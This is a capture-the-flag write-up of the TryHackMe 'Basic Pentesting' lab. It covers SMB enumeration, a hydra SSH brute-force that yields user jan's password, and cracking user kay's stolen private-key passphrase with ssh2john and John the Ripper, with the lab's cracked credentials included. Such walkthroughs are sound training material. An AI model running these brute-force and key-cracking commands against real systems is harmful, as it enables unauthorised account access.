Basic Pentesting

CTF Writeup: Basic Pentesting

Link: TryHackMe | OS: Linux | Difficulty: Easy | Date: 2025-11-08 | Author: S3Z4R

---

1. Reconnaissance

Nmap Scanning

We realize there is SMB and SSH.

Directory Enumeration

Using gobuster to find directories on the web server. [ No Luck Here :) ]

gobuster dir -u http://<Machine-IP> -w directory-list-1.0.txt -x .php

SMB Enumeration

Listing shares on the SMB server.

❯ smbclient -L <Machine-IP> -N

        Sharename       Type      Comment
        ---------       ----      -------
        Anonymous       Disk

Connecting to the anonymous share.

smbclient //<Machine-IP>/Anonymous -N

Inside the share, get staff.txt was used. The file revealed two user names: Jan and Kay.

2. Initial Access

Brute-forcing SSH (User Jan)

Using hydra to crack Jan’s SSH password.

❯ hydra -l jan -P kali-wordlists/rockyou.txt ssh://<Machine-IP>
[22][ssh] host: <Machine-IP>     login: jan     password: armando

3. Privilege Escalation (to User Kay)

After logging in as Jan, a private SSH key (id_rsa) was found in Kay’s home directory, and it was readable by Jan.

Cracking the SSH Key Passphrase

The key was copied and permissions were set.

chmod 600 id_rsa

Attempting to log in with the key revealed it was protected by a passphrase.

ssh -i ~/.ssh/id_rsa kay@server_ip

ssh2john was used to create a hash of the key.

ssh2john.py id_rsa > id_rsa.hash

John the Ripper was used to crack the hash against a wordlist.

john --wordlist=rockyou.txt id_rsa.hash

The cracked passphrase was: beeswax

beeswax         (id_rsa)

Accessing Kay’s Account

Using the private key and the cracked passphrase to log in as Kay.

4. Final Flag

Once logged in as Kay, the final password was found in pass.bak.

kay@<Machine-IP>:~$ cat pass.bak
here...cy$$

---

Direct Link